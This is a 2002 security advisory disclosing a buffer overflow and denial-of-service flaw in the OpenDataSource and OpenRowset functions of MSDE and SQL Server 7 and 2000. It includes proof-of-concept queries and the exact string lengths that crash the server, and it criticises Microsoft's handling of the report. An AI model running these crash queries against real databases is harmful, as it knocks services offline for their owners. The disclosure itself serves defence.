Security Advisory Name : MSDE, Sql Server 7 & 2000 Adhoc Heterogenous Queries Buffer Overflow and DOS. System Affected: MSDE, Sql Server 7, Sql Server 2000 with all service packs and fixes applied. Severity: High Author: Cesar Cerrudo. Date: 19th February 2002 Advisory Number: CC020201 Description: Distributed queries access data from multiple heterogeneous data sources, which can be stored in either the same or different computers. Microsoft SQL Server supports distributed queries by using OLE DB, the Microsoft specification of an application programming interface (API) for universal data access. Distributed queries provide SQL Server users with access to: -Distributed data stored in multiple computers that are running SQL Server. -Heterogeneous data stored in various relational and non-relational data sources that can be accessed using an OLE DB provider. You can reference heterogeneous OLE DB data sources in Transact-SQL statements by: -Linked servers , OpenQuery funtion. -OpenDataSource and OpenRowset functions. OpenDataSource and OpenRowset functions are accessible to all users and contain an unchecked buffer in one of its parameters. The buffer overflow and DOS problem ocurr when an overly long string is supplied in the "provider name" parameter. Details: In Sql server 7 overflow starts at character number 6819 and if the amount of characteres is >= 6918 the server will crash : SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' ---> 6819 characteres or more ,'')...nothing SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' ---> 6819 characteres or more ,'', '') In Sql server 2000 overflow starts at character number 6887 and if the amount of characteres is >= 6998 the server will crash : SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' ---> 6887 characteres or more ,'')...nothing SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' ---> 6887 characteres or more ,'', '') Depend on de amount of characters some registry values are overwriten. Try with this examples and then take a look at the dump file. Patch Available: NONE Workaround: Shutdown the servers. Vendor Status : Microsoft was contacted. When i contacted them i explicitly told them that i would apply RFPolicy v2. They asked me for the details and i gave it to them and then they told me that they would contact me again. The first time they walk in the edge of the policy and in the 5th day they contacted me again. Now i havent been contacted by them in the last 8 days, so i disclose the information. Maybe this is a new Microsoft's policy, to not contact the researcher in the proper time and not expend time in writing a three words mail. One more thing Microsoft doesn't digitally sign the mails from the Security Response Center when they contact you, i think this is a vulnerability. I discover another 3 or 4 security holes in sql server with diverse severity, i will release them soon. Dont blame me for this please, blame MICROSOFT!!!!!!!!!. __________________________________________________ Do You Yahoo!? Yahoo! Sports - Coverage of the 2002 Olympic Games http://sports.yahoo.com
